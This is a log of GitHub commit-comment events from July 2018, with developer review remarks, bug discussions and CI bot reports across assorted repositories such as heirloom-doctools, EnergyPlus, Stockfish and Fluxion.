{"id":"7959524503","type":"CommitCommentEvent","actor":{"login":"reffort"},"repo":{"name":"n-t-roff/heirloom-doctools"},"payload":{"comment":{"id":29693380,"position":null,"line":null,"path":null,"commit_id":"fd2816bbce0e5f8830e5c977cdaf8d322d84db10","created_at":"2018-07-13T01:24:05Z","updated_at":"2018-07-13T01:24:05Z","author_association":"CONTRIBUTOR","body":"While establishing a baseline for comparison, I realized that the User's Manual PDF I uploaded was made using development code.  There are a few differences due to this:\r\n\r\n1. Despite what I thought earlier, there are _no_ differences due to rhanglevel.  rhanglevel was functional in the development code at the time the PDF was made.  To confirm this, edit the source file to change the line `. rhanglevel 2` to `. rhanglevel 0` (which turns off rhanglevel) and rebuild the document.  There are quite a few lines that change as a result, and all of them should be worse with `.rhanglevel 0`.\r\n\r\n2. Hyphenation differences.  The development code has a tentative fix for an error in the hyphenation logic.  The error always allows the last two letters of a word to be broken off if the word is followed by a punctuation mark.  The punctuation is counted as part of the word, consequently the `.hy` setting that disallows breaking off the last two _letters_ doesn't matter in this case because the unmodified code counts the last two _characters_.  There are several cases of \"dynamical-ly.\", \"val-ue.\", \"ze-ro.\", \"start-ed.\", etc., (note the period following the word) in the typotests-made document that are not in the PDF made with the development code.  (The fix is \"tentative\" because it thoroughly breaks the ancient digraph hyphenation.)\r\n\r\n3. Inexplicible differences on pages: 2 (last line), 38 (near the bottom), 49 (toward the bottom), and 65 (middle of the left column).  I'll have to check these further, but I think they are due to a bug fix made to typotests after the PDF was made, or possibly to some experimental dev code.  The difference on page 2 could not have been caused by the dev code.  In all four cases, the typotests paragraph is better, so I'm leaning toward the bug fix."}},"created_at":"2018-07-13T01:24:05Z"}
{"id":"7959524845","type":"CommitCommentEvent","actor":{"login":"KyloRenRS"},"repo":{"name":"awbridgers/chess"},"payload":{"comment":{"id":29693382,"position":4,"line":65,"path":"src/App.js","commit_id":"536e9dcb594a8fedff736c87d1422675c5534d45","created_at":"2018-07-13T01:24:13Z","updated_at":"2018-07-13T01:24:13Z","author_association":"NONE","body":"If you declare your functions using arrow notation, i.e. `evaluateScore = () => {...}` instead of `evaluateScore() {...}`, then you don't have to bind them to `this` in the constructor."}},"created_at":"2018-07-13T01:24:13Z"}
{"id":"7959525404","type":"CommitCommentEvent","actor":{"login":"vinayakapawar"},"repo":{"name":"ktgnair/OS-MSK_PPBC_Export"},"payload":{"comment":{"id":29693383,"position":5,"line":10,"path":"src/main/resources/pluginContext.xml","commit_id":"b3d06c3393725ab09a8d941ef632338ca32c1a71","created_at":"2018-07-13T01:24:27Z","updated_at":"2018-07-13T01:24:27Z","author_association":"NONE","body":"It will be com.krishagni.openspecimen.msk.pbcc? Otherwise, the entire OpenSpecimen class hierarchy will be scanned, which I don't want."}},"created_at":"2018-07-13T01:24:27Z"}
{"id":"7959540174","type":"CommitCommentEvent","actor":{"login":"grshane"},"repo":{"name":"wvu-online/online-orientation"},"payload":{"comment":{"id":29693420,"position":null,"line":null,"path":null,"commit_id":"8e629679f39a98e50de8f45859a7a4683f73b43d","created_at":"2018-07-13T01:30:30Z","updated_at":"2018-07-13T01:30:30Z","author_association":"COLLABORATOR","body":"Created multidev environment [online-orientation#ci-214](https://dashboard.pantheon.io/sites/714bd05e-1a33-4f35-93a2-e9d6add67063#ci-214).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://ci-214-online-orientation.pantheonsite.io/)"}},"created_at":"2018-07-13T01:30:30Z"}
{"id":"7959543438","type":"CommitCommentEvent","actor":{"login":"noobpwnftw"},"repo":{"name":"vondele/Stockfish"},"payload":{"comment":{"id":29693432,"position":null,"line":null,"path":null,"commit_id":"fbbc57c77902059c82393feb6ad5cb431666490e","created_at":"2018-07-13T01:31:47Z","updated_at":"2018-07-13T01:31:47Z","author_association":"NONE","body":"```\r\n[root@localhost ~]# cat /proc/buddyinfo\r\nNode 0, zone      DMA      1      1      0      0      2      1      1      0      1      1      3\r\nNode 0, zone    DMA32    152    287    138     79     64     16    123     62    543      5     29\r\nNode 0, zone   Normal   3457   2155    169     11      0      0      0      0      0      0      0\r\nNode 1, zone   Normal   2607   2380   1506    723   2414   1690   1384   1183   1095  12615   7951\r\nNode 2, zone   Normal   3360    499    452    152     51     16      1      0      0      0      0\r\nNode 3, zone   Normal   3783   2356     39     10      1      0      0      0      0      0      0\r\nNode 4, zone   Normal   2898   2841     15      0      0      0      0      0      0      0      0\r\nNode 5, zone   Normal   5771   1902   1707    875   1540   2480   2092   1627   1467  13416   2064\r\nNode 6, zone   Normal   2824   1830    541      0      0      0      0      0      0      0      0\r\nNode 7, zone   Normal   3812   2064    173     22      0      0      0      0      0      0      0\r\n```\r\n\r\n\r\nI did `echo 1 > /proc/sys/vm/compact_memory`, problem remains.\r\nThen I did `echo 3 > /proc/sys/vm/drop_caches` and it took roughly 5 minutes to run and seems fixed the problem.\r\n\r\n```\r\n[root@localhost ~]# cat /proc/buddyinfo\r\nNode 0, zone      DMA      1      1      0      0      2      1      1      0      1      1      3\r\nNode 0, zone    DMA32   1215   1085    953    730    539    372    300    210    266    101    140\r\nNode 0, zone   Normal   4611   4402   3939   3470   2639   2616   2430   2134   1958   2058  45173\r\nNode 1, zone   Normal  13598  12742  11625  10703  11732  10398   8842   7251   5633   4753  42097\r\nNode 2, zone   Normal  42002  58331  55976  49545  42441  35679  28120  20283  14177  12001  31585\r\nNode 3, zone   Normal   5632   5234   4850   3622   2609   2376   2194   1845   1660   1579  46205\r\nNode 4, zone   Normal   7385   8010   7930   7961   7370   6581   5390   4271   3454   3652  44052\r\nNode 5, zone   Normal  25026  22790  20330  18538  17461  17195  14742  11513   9320   7616  38375\r\nNode 6, zone   Normal   6029   5932   5259   4339   3577   3320   3024   2529   2279   1998  45747\r\nNode 7, zone   Normal   8091   8050   8330   7628   6298   5718   5128   4508   4286   4056  43629\r\n\r\n```"}},"created_at":"2018-07-13T01:31:47Z"}
{"id":"7959545168","type":"CommitCommentEvent","actor":{"login":"sriadiga"},"repo":{"name":"ktgnair/OS-MSK_PPBC_Export"},"payload":{"comment":{"id":29693436,"position":24,"line":24,"path":"src/main/java/com/krishagni/openspecimen/DistributionProtocolExport.java","commit_id":"b3d06c3393725ab09a8d941ef632338ca32c1a71","created_at":"2018-07-13T01:32:30Z","updated_at":"2018-07-13T01:32:30Z","author_association":"NONE","body":"We talked about this yesterday. We will need a jobmanager. We will add it later once individual exports are done."}},"created_at":"2018-07-13T01:32:30Z"}
{"id":"7959554147","type":"CommitCommentEvent","actor":{"login":"discoursebot"},"repo":{"name":"discourse/discourse"},"payload":{"comment":{"id":29693465,"position":null,"line":null,"path":null,"commit_id":"83110a1a812140382167e8f5339c8bde3ee6610d","created_at":"2018-07-13T01:36:18Z","updated_at":"2018-07-13T01:36:18Z","author_association":"NONE","body":"This commit has been mentioned on **Discourse Meta**. There might be relevant details there:\n\nhttps://meta.discourse.org/t/cannot-backup-my-development-instance-fails/92223/2\n"}},"created_at":"2018-07-13T01:36:18Z"}
{"id":"7959560270","type":"CommitCommentEvent","actor":{"login":"tgxworld"},"repo":{"name":"discourse/discourse"},"payload":{"comment":{"id":29693477,"position":5,"line":7,"path":"lib/topic_view.rb","commit_id":"81f9500f5c435d893e60c7a65405e99af059e6f3","created_at":"2018-07-13T01:38:47Z","updated_at":"2018-07-13T01:38:47Z","author_association":"MEMBER","body":"My bad! Thank you for fixing :heart: "}},"created_at":"2018-07-13T01:38:47Z"}
{"id":"7959560670","type":"CommitCommentEvent","actor":{"login":"FernandoFigueroa0710"},"repo":{"name":"FernandoFigueroa0710/recursion-prompts"},"payload":{"comment":{"id":29693479,"position":null,"line":null,"path":null,"commit_id":"fa872f0ddaf9b5ffba0692c801566dd1af29d96d","created_at":"2018-07-13T01:38:55Z","updated_at":"2018-07-13T01:38:55Z","author_association":"OWNER","body":"Exercise 19 with pseudo code to resolve the \"FizzBuzz\" Challenge "}},"created_at":"2018-07-13T01:38:55Z"}
{"id":"7959561122","type":"CommitCommentEvent","actor":{"login":"satoyuichi"},"repo":{"name":"yosuke25/nHighSchoolReportProgress"},"payload":{"comment":{"id":29693480,"position":5,"line":5,"path":"main.js","commit_id":"871a84ca857e4a7432771345db886613bacc3c31","created_at":"2018-07-13T01:39:04Z","updated_at":"2018-07-13T01:39:04Z","author_association":"NONE","body":"変数名は長くても良いのでわかりやすい方が良いと思います。具体的には `elements` とか"}},"created_at":"2018-07-13T01:39:04Z"}
{"id":"7959561289","type":"CommitCommentEvent","actor":{"login":"carsonblack"},"repo":{"name":"carsonblack/therapyrealm-d8"},"payload":{"comment":{"id":29693481,"position":null,"line":null,"path":null,"commit_id":"256f0dc589d8ebd662723bf794e92dfdc3313282","created_at":"2018-07-13T01:39:09Z","updated_at":"2018-07-13T01:39:09Z","author_association":"OWNER","body":"Created multidev environment [therapyrealm-d8#ci-81](https://dashboard.pantheon.io/sites/1e2f72fb-b1d6-4944-b76a-de18b38c3d0c#ci-81).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://ci-81-therapyrealm-d8.pantheonsite.io/)"}},"created_at":"2018-07-13T01:39:09Z"}
{"id":"7959565531","type":"CommitCommentEvent","actor":{"login":"satoyuichi"},"repo":{"name":"yosuke25/nHighSchoolReportProgress"},"payload":{"comment":{"id":29693493,"position":3,"line":3,"path":"main.js","commit_id":"871a84ca857e4a7432771345db886613bacc3c31","created_at":"2018-07-13T01:40:47Z","updated_at":"2018-07-13T01:40:47Z","author_association":"NONE","body":"基本的に変数宣言には `let` を使うようにして良いと思います。"}},"created_at":"2018-07-13T01:40:47Z"}
{"id":"7959571539","type":"CommitCommentEvent","actor":{"login":"satoyuichi"},"repo":{"name":"yosuke25/nHighSchoolReportProgress"},"payload":{"comment":{"id":29693497,"position":52,"line":52,"path":"main.js","commit_id":"871a84ca857e4a7432771345db886613bacc3c31","created_at":"2018-07-13T01:43:13Z","updated_at":"2018-07-13T01:43:13Z","author_association":"NONE","body":"好みもあるけど条件式は意図したまとまりでかっこで括ることをオススメします。\r\n`if ((ch[1][chCnt].className === 'report_progress') && (chTxt.substr(-1, 1) === '%') && (chTxt !== '-')) {`\r\nこんな感じ。あるいは関数でくくり出すとさらに分かりやすくなります。"}},"created_at":"2018-07-13T01:43:13Z"}
{"id":"7959575868","type":"CommitCommentEvent","actor":{"login":"satoyuichi"},"repo":{"name":"yosuke25/nHighSchoolReportProgress"},"payload":{"comment":{"id":29693509,"position":null,"line":null,"path":null,"commit_id":"871a84ca857e4a7432771345db886613bacc3c31","created_at":"2018-07-13T01:44:58Z","updated_at":"2018-07-13T01:44:58Z","author_association":"NONE","body":"変数の命名や空行を適当に使えるようになるともっと良くなると思います。\r\nちょっとしたプログラムも読みやすいプログラムになるよう心がけるとレベルアップも早くなると思います。"}},"created_at":"2018-07-13T01:44:58Z"}
{"id":"7959577425","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":29693515,"position":null,"line":null,"path":null,"commit_id":"417a0bacb5889f80ef7a5e36df8d00d4298076fc","created_at":"2018-07-13T01:45:33Z","updated_at":"2018-07-13T01:45:33Z","author_association":"NONE","body":"issue_#6803 (mbadams5) - x86_64-Linux-Ubuntu-14.04-gcc-4.8-IntegrationCoverage-Debug: Tests Failed (1468 of 2312 tests passed, 0 test warnings)\n\n\n\nFailures:\n\n\nDataSetFixture Test Summary\n * Passed: 37\n * Failed: 2\n\nEnergyPlusFixture Test Summary\n * Passed: 447\n * Failed: 191\n * OTHER_FAULT: 7\n\nInputProcessorFixture Test Summary\n * Passed: 40\n * Failed: 9\n\nintegration Test Summary\n * Passed: 2\n * Failed: 626\n\nSQLiteFixture Test Summary\n * Passed: 65\n * Failed: 3\n\nZoneUnitarySystemTest Test Summary\n * Passed: 3\n * Failed: 4\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-417a0bacb5889f80ef7a5e36df8d00d4298076fc-x86_64-Linux-Ubuntu-14.04-gcc-4.8-IntegrationCoverage-Debug.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.png)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-417a0bacb5889f80ef7a5e36df8d00d4298076fc-x86_64-Linux-Ubuntu-14.04-gcc-4.8-IntegrationCoverage-Debug.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-63.49%25-red.png)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-417a0bacb5889f80ef7a5e36df8d00d4298076fc-x86_64-Linux-Ubuntu-14.04-gcc-4.8-IntegrationCoverage-Debug.html'>![Coverage Badge](http://img.shields.io/badge/coverage%20status-20.17%25-red.png)</a>\n"}},"created_at":"2018-07-13T01:45:33Z"}
{"id":"7959577507","type":"CommitCommentEvent","actor":{"login":"anilkmr575"},"repo":{"name":"anilkmr575/ansible"},"payload":{"comment":{"id":29693517,"position":null,"line":null,"path":null,"commit_id":"eda95beae85f25b924efe92a9b5f754d669bc84f","created_at":"2018-07-13T01:45:34Z","updated_at":"2018-07-13T01:45:34Z","author_association":"OWNER","body":"ec2:\r\n  region: ap-south-1\r\n  security_group: my_custom_security_group\r\n  key: my_cloud_key2\r\n  instance_type: t2.micro\r\n  count: 1\r\n  image: ami-5b673c34\r\n  tags:\r\n    Name: awslabserver\r\n    Owner: cp\r\n  subnet: \r\n  volumes:\r\n        - device_name: /dev/sda1\r\n          volume_type: gp2\r\n          volume_size: 10\r\n          delete_on_termination: True   \r\n  AWS_ACCESS_KEY_ID: \r\nAWS_SECRET_ACCESS_KEY: "}},"created_at":"2018-07-13T01:45:34Z"}
{"id":"7959580890","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":29693524,"position":null,"line":null,"path":null,"commit_id":"417a0bacb5889f80ef7a5e36df8d00d4298076fc","created_at":"2018-07-13T01:46:57Z","updated_at":"2018-07-13T01:46:57Z","author_association":"NONE","body":"issue_#6803 (mbadams5) - x86_64-Linux-Ubuntu-14.04-custom_check: OK (0 of 0 tests passed, 0 test warnings)\n\n\n\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-417a0bacb5889f80ef7a5e36df8d00d4298076fc-x86_64-Linux-Ubuntu-14.04-custom_check.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.png)</a>  \n"}},"created_at":"2018-07-13T01:46:57Z"}
{"id":"7959581443","type":"CommitCommentEvent","actor":{"login":"nrel-bot-3"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":29693529,"position":null,"line":null,"path":null,"commit_id":"0d772e2992138c820c793b125d4b735138aba8d6","created_at":"2018-07-13T01:47:11Z","updated_at":"2018-07-13T01:47:11Z","author_association":"NONE","body":"FanEnergyIndex (XuanLuoLBL) - x86_64-MacOS-10.9-clang: OK (2936 of 2937 tests passed, 622 test warnings)\n\nMessages:\n\n * 622 tests had: AUD diffs.\n\nFailures:\n\n\nintegration Test Summary\n * Passed: 625\n * Failed: 1\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-0d772e2992138c820c793b125d4b735138aba8d6-x86_64-MacOS-10.9-clang.html'>![Build Badge](http://img.shields.io/badge/build%20status-warnings-yellow.png)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-0d772e2992138c820c793b125d4b735138aba8d6-x86_64-MacOS-10.9-clang.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-99.97%25-yellow.png)</a> \n"}},"created_at":"2018-07-13T01:47:11Z"}
{"id":"7959584155","type":"CommitCommentEvent","actor":{"login":"ShayBox"},"repo":{"name":"joaomoreno/github-sharp-theme"},"payload":{"comment":{"id":29693532,"position":null,"line":null,"path":null,"commit_id":"9644d99733ccbb0a61b2c9a6858b09737d03de7e","created_at":"2018-07-13T01:48:21Z","updated_at":"2018-07-13T01:48:21Z","author_association":"NONE","body":"What is this font/mixture of fonts, I love it"}},"created_at":"2018-07-13T01:48:21Z"}
{"id":"7959587059","type":"CommitCommentEvent","actor":{"login":"kis6905"},"repo":{"name":"kis6905/Spring"},"payload":{"comment":{"id":29693535,"position":4,"line":3,"path":"SpringBootGraphQL/src/main/resources/logback.xml","commit_id":"ba62ada12b11ef0153fa50cb079ffdaaf8ed45b6","created_at":"2018-07-13T01:49:32Z","updated_at":"2018-07-13T01:49:32Z","author_association":"OWNER","body":"good"}},"created_at":"2018-07-13T01:49:32Z"}
{"id":"7959588210","type":"CommitCommentEvent","actor":{"login":"Prithvirajbilla"},"repo":{"name":"scala/scala"},"payload":{"comment":{"id":29693538,"position":null,"line":null,"path":null,"commit_id":"26e3e9085a82c17c60502b2914c37ae14a41d533","created_at":"2018-07-13T01:49:59Z","updated_at":"2018-07-13T01:49:59Z","author_association":"CONTRIBUTOR","body":"@isaacl  yeah, julienrf reviewed this commit. As NthPortal mentioned this is re-aligning with 2.12, Also that was an ask in the issue (scala/bug#10991) "}},"created_at":"2018-07-13T01:49:59Z"}
{"id":"7959590794","type":"CommitCommentEvent","actor":{"login":"MPX4132"},"repo":{"name":"FluxionNetwork/fluxion"},"payload":{"comment":{"id":29693547,"position":null,"line":null,"path":null,"commit_id":"3353955e1fc08f9698ba57a2fd0496c57c05b2d7","created_at":"2018-07-13T01:51:01Z","updated_at":"2018-07-13T01:51:01Z","author_association":"MEMBER","body":"When dealing with bash, the `test` command has syntactic sugar, that's the `[ ... ]`. When you use the chaining operator, `&&`, you perform the second command upon successful completion of the first, in this case, the first `test` command. When you do `[ ... ] && [ ... ]` you're launching the test command twice, whereas `[ ... -a ... ]` launches it once, and is equivalent to `test ... -a ...`. This wasn't too much of a big deal, I just it that way because I used to test the script on my Raspberry Pi, and I tried optimizing it a bit.\r\n\r\nI tested the script on Kali, which is the primary operating system I provide support for, and the script failed to give the xterm a proper size. It was as small as the xterm window could possibly get, which means it failed to work. If it worked on Debian, it should've worked on Kali.\r\n\r\nThe control character you were using with `printf` wasn't working on Kali, and the text kept shifting causing the banner to print out distorted, shifting all the columns after it.\r\n\r\nI'm aware bash subroutines don't support negative values, I encountered issues related to that while developing fluxion 4. Notice I explicitly gave you the reason why I marked it as a bug, and it wasn't because I thought `-1` return codes are valid.\r\n> All of these are bugs due to outdated documentation.\r\nThe second reason, which I didn't mention because I didn't think it'd be necessary, was that some conditions are explicitly checking for NOT 1, and you went and replace all the `-1` making them `1`, which would trigger the wrong sequences.\r\n\r\n`-1` in fluxion is treated as a \"go back\". I know `-1` never gets truly returned, and if I recall correctly, the value overflows and a `255` is returned instead, and that's okay, so long as it's not `1` because some functions are checking explicitly for a `1`, and sometimes `1` is considered \"success\" on some instances, while `-1` is always considered \"aborted.\" Sorry I didn't explain that earlier, but if I recall correctly, I did post that in the commit notes when I was working on the script."}},"created_at":"2018-07-13T01:51:01Z"}
{"id":"7959594765","type":"CommitCommentEvent","actor":{"login":"Tribal1012"},"repo":{"name":"Tribal1012/mipsHex"},"payload":{"comment":{"id":29693556,"position":2,"line":63,"path":"base/operand.py","commit_id":"c093d20bfed315fee074897ce310443a57d8242b","created_at":"2018-07-13T01:52:36Z","updated_at":"2018-07-13T01:52:36Z","author_association":"OWNER","body":"problem case : (aAddr+1 - 0xC)\r\n\r\nsolution : match = re.match(r\"^\\((0-9a-zA-Z_]+)([+-][0-9a-fA-Fx]+) ([+-] [0-9a-fA-Fx]+)\\)$\", self.value)"}},"created_at":"2018-07-13T01:52:36Z"}
{"id":"7959597370","type":"CommitCommentEvent","actor":{"login":"carsonblack"},"repo":{"name":"carsonblack/therapyrealm-d8"},"payload":{"comment":{"id":29693558,"position":null,"line":null,"path":null,"commit_id":"6197c56f0475ddd204894aec156fb3277c75cadd","created_at":"2018-07-13T01:53:42Z","updated_at":"2018-07-13T01:53:42Z","author_association":"OWNER","body":"Created multidev environment [therapyrealm-d8#ci-84](https://dashboard.pantheon.io/sites/1e2f72fb-b1d6-4944-b76a-de18b38c3d0c#ci-84).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://ci-84-therapyrealm-d8.pantheonsite.io/)"}},"created_at":"2018-07-13T01:53:42Z"}
{"id":"7959607919","type":"CommitCommentEvent","actor":{"login":"nrel-bot"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":29693581,"position":null,"line":null,"path":null,"commit_id":"0d772e2992138c820c793b125d4b735138aba8d6","created_at":"2018-07-13T01:58:04Z","updated_at":"2018-07-13T01:58:04Z","author_association":"NONE","body":"FanEnergyIndex (XuanLuoLBL) - i386-Windows-7-VisualStudio-14: OK (2936 of 2937 tests passed, 0 test warnings)\n\n\n\nFailures:\n\n\nintegration Test Summary\n * Passed: 625\n * Failed: 1\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-0d772e2992138c820c793b125d4b735138aba8d6-i386-Windows-7-VisualStudio-14.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.png)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-0d772e2992138c820c793b125d4b735138aba8d6-i386-Windows-7-VisualStudio-14.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-99.97%25-yellow.png)</a> \n"}},"created_at":"2018-07-13T01:58:04Z"}
{"id":"7959608933","type":"CommitCommentEvent","actor":{"login":"isaacl"},"repo":{"name":"scala/scala"},"payload":{"comment":{"id":29693584,"position":null,"line":null,"path":null,"commit_id":"26e3e9085a82c17c60502b2914c37ae14a41d533","created_at":"2018-07-13T01:58:25Z","updated_at":"2018-07-13T01:58:25Z","author_association":"CONTRIBUTOR","body":"my bad, I didn't see the PR and the commit msg isn't as clear as the PR description. sorry about that."}},"created_at":"2018-07-13T01:58:25Z"}
{"id":"7959609290","type":"CommitCommentEvent","actor":{"login":"ivanbrennan"},"repo":{"name":"ivanbrennan/fakeproject"},"payload":{"comment":{"id":29693585,"position":28,"line":28,"path":"shell.nix","commit_id":"e8f525226303dc563610af3d7f5a258c636e4f2a","created_at":"2018-07-13T01:58:35Z","updated_at":"2018-07-13T01:58:35Z","author_association":"OWNER","body":"Using `rubyenv.bundledRuby` I get an error: `error: attribute 'bundledRuby' missing`. But `rubyenv.ruby` works."}},"created_at":"2018-07-13T01:58:35Z"}
{"id":"7959611606","type":"CommitCommentEvent","actor":{"login":"kumine"},"repo":{"name":"kumine/LiquidAssociation"},"payload":{"comment":{"id":29693588,"position":null,"line":null,"path":null,"commit_id":"061883b1286b881189950a5590a126a218c6fbc5","created_at":"2018-07-13T01:59:29Z","updated_at":"2018-07-13T01:59:29Z","author_association":"OWNER","body":"dd"}},"created_at":"2018-07-13T01:59:29Z"}
{"id":"7959611807","type":"CommitCommentEvent","actor":{"login":"Tribal1012"},"repo":{"name":"Tribal1012/mipsHex"},"payload":{"comment":{"id":29693589,"position":3,"line":13,"path":"mipsHex/asm_type/mips_asm_set.py","commit_id":"77d2316ef9837c54895e86fbed4d0db84e9b5859","created_at":"2018-07-13T01:59:34Z","updated_at":"2018-07-13T01:59:34Z","author_association":"OWNER","body":"need to add others 'set' assemblies in reference.\r\n\r\nreference : https://www.joinc.co.kr/w/Site/Assembly/Documents/Spim/spim-chapter24"}},"created_at":"2018-07-13T01:59:34Z"}
{"id":"7961238094","type":"CommitCommentEvent","actor":{"login":"trourance"},"repo":{"name":"powa-team/powa-archivist"},"payload":{"comment":{"id":29697590,"position":null,"line":null,"path":null,"commit_id":"7456771e769547bac01d4331e1a294f34f70c33c","created_at":"2018-07-13T10:02:16Z","updated_at":"2018-07-13T10:02:16Z","author_association":"NONE","body":"\"fluancefg\" username has been changed to \"trourance\""}},"created_at":"2018-07-13T10:02:16Z"}
{"id":"7961243581","type":"CommitCommentEvent","actor":{"login":"me4502"},"repo":{"name":"sk89q/WorldEdit"},"payload":{"comment":{"id":29697600,"position":12,"line":34,"path":"worldedit-core/src/main/java/com/sk89q/worldedit/function/generator/GardenPatchGenerator.java","commit_id":"350d81d1113dfdcea8df254bed2474ef394b91a0","created_at":"2018-07-13T10:03:25Z","updated_at":"2018-07-13T10:03:25Z","author_association":"COLLABORATOR","body":"Huh.. Yeah, thanks. I'll fix that"}},"created_at":"2018-07-13T10:03:25Z"}
{"id":"7961244974","type":"CommitCommentEvent","actor":{"login":"godo13405"},"repo":{"name":"godo13405/dialogflow-v2-client"},"payload":{"comment":{"id":29697604,"position":null,"line":null,"path":null,"commit_id":"3d0c1cbbcdf9734faf6776ac61f46f72d5f62151","created_at":"2018-07-13T10:03:42Z","updated_at":"2018-07-13T10:03:42Z","author_association":"OWNER","body":"IBM Cloud [toolchain](https://console.bluemix.net/devops/toolchains/9db350e1-1bdd-46ce-b6bc-f1a1fe7aae7f?env_id=ibm%3Ayp%3Aeu-gb \"dialogflow-v2-client\"): [Delivery Pipeline](https://console.bluemix.net/devops/pipelines/7c2d4740-e52d-4d28-af66-f8589eede134?env_id=ibm%3Ayp%3Aeu-gb \"dialogflow-v2-client\") deployed [dialogflow-v2-client](https://github.com/godo13405/dialogflow-v2-client/releases/tag/deploy-ibm-yp-eu-gb-UXCalibur-prod-20180713-100341 \"deploy-ibm-yp-eu-gb-UXCalibur-prod-20180713-100341\") to [prod](https://console.bluemix.net/apps/7c20ca82-deb0-46f6-91cb-ccd808781f77?env_id=ibm:yp:eu-gb \"ibm:yp:eu-gb:UXCalibur:prod\"), including this commit"}},"created_at":"2018-07-13T10:03:42Z"}
{"id":"7961247671","type":"CommitCommentEvent","actor":{"login":"jordy-ruiz"},"repo":{"name":"matricks/bam"},"payload":{"comment":{"id":29697608,"position":null,"line":null,"path":null,"commit_id":"10c0f237800fbf4599eb291cdf1cd9cf1914e7be","created_at":"2018-07-13T10:04:13Z","updated_at":"2018-07-13T10:04:13Z","author_association":"NONE","body":"D:\r\nThat was a cool feature I used to track circular dependencies.\r\nSad to see it go suddenly"}},"created_at":"2018-07-13T10:04:13Z"}
{"id":"7961253089","type":"CommitCommentEvent","actor":{"login":"deletescape"},"repo":{"name":"songotenks69/ocbot"},"payload":{"comment":{"id":29697617,"position":null,"line":null,"path":null,"commit_id":"bd7cc90e13d95bc592ce44cd0320bf91dfa50483","created_at":"2018-07-13T10:05:21Z","updated_at":"2018-07-13T10:05:21Z","author_association":"COLLABORATOR","body":"wew"}},"created_at":"2018-07-13T10:05:21Z"}
{"id":"7961253328","type":"CommitCommentEvent","actor":{"login":"titpetric"},"repo":{"name":"crusttech/crust"},"payload":{"comment":{"id":29697618,"position":11,"line":11,"path":".editorconfig","commit_id":"25f04617f2fde4fbdef02a8147c3375b3b0ae564","created_at":"2018-07-13T10:05:23Z","updated_at":"2018-07-13T10:05:23Z","author_association":"COLLABORATOR","body":"LOL"}},"created_at":"2018-07-13T10:05:23Z"}
{"id":"7961257737","type":"CommitCommentEvent","actor":{"login":"ignatenkobrain"},"repo":{"name":"openSUSE/libsolv"},"payload":{"comment":{"id":29697631,"position":null,"line":null,"path":null,"commit_id":"9b3e5ec64d775dbda5dbafec00274f92b7bd640e","created_at":"2018-07-13T10:06:17Z","updated_at":"2018-07-13T10:06:17Z","author_association":"COLLABORATOR","body":"Can we make it to use system zck library?"}},"created_at":"2018-07-13T10:06:17Z"}
{"id":"7961269214","type":"CommitCommentEvent","actor":{"login":"nfeske"},"repo":{"name":"alex-ab/genode"},"payload":{"comment":{"id":29697655,"position":null,"line":null,"path":null,"commit_id":"834113607dbd241332ce36f674d9b9af61b0c3ba","created_at":"2018-07-13T10:08:42Z","updated_at":"2018-07-13T10:08:42Z","author_association":"NONE","body":"I merged both update commits (seoul, vbox) to staging."}},"created_at":"2018-07-13T10:08:42Z"}
{"id":"7961275154","type":"CommitCommentEvent","actor":{"login":"ensonic"},"repo":{"name":"rishabhdeepsingh/robertalab"},"payload":{"comment":{"id":29697675,"position":null,"line":null,"path":null,"commit_id":"739f03c58d13b43a3d36d01a9ff0bd34f80d15f7","created_at":"2018-07-13T10:09:55Z","updated_at":"2018-07-13T10:09:55Z","author_association":"NONE","body":"We wan't to keep the run.sh simple. A shell script is not super portable (it needs a shell :/).\r\nLets discuss in a ticket first where to install the database and then lets try to adjust this. FYI. the openroberta server will upgrade the database when the schema changes, so the target location should probably contain the version number."}},"created_at":"2018-07-13T10:09:55Z"}
{"id":"7961282142","type":"CommitCommentEvent","actor":{"login":"tlesaku"},"repo":{"name":"btcontract/wallet"},"payload":{"comment":{"id":29697684,"position":3,"line":11,"path":"app/app.iml","commit_id":"78255738dbc4dc95ed712e518529321d56733195","created_at":"2018-07-13T10:11:25Z","updated_at":"2018-07-13T10:11:25Z","author_association":"NONE","body":"tlesaku"}},"created_at":"2018-07-13T10:11:25Z"}
{"id":"7961295312","type":"CommitCommentEvent","actor":{"login":"grigory733"},"repo":{"name":"grigory733/veneers"},"payload":{"comment":{"id":29697712,"position":null,"line":null,"path":null,"commit_id":"870043d48b65b62d7c70ab43352cb089181f96fa","created_at":"2018-07-13T10:14:15Z","updated_at":"2018-07-13T10:14:15Z","author_association":"OWNER","body":"I doing New changes "}},"created_at":"2018-07-13T10:14:15Z"}
{"id":"7961295896","type":"CommitCommentEvent","actor":{"login":"tlesaku"},"repo":{"name":"btcontract/wallet"},"payload":{"comment":{"id":29697713,"position":null,"line":null,"path":null,"commit_id":"78255738dbc4dc95ed712e518529321d56733195","created_at":"2018-07-13T10:14:22Z","updated_at":"2018-07-13T10:14:22Z","author_association":"NONE","body":".."}},"created_at":"2018-07-13T10:14:22Z"}
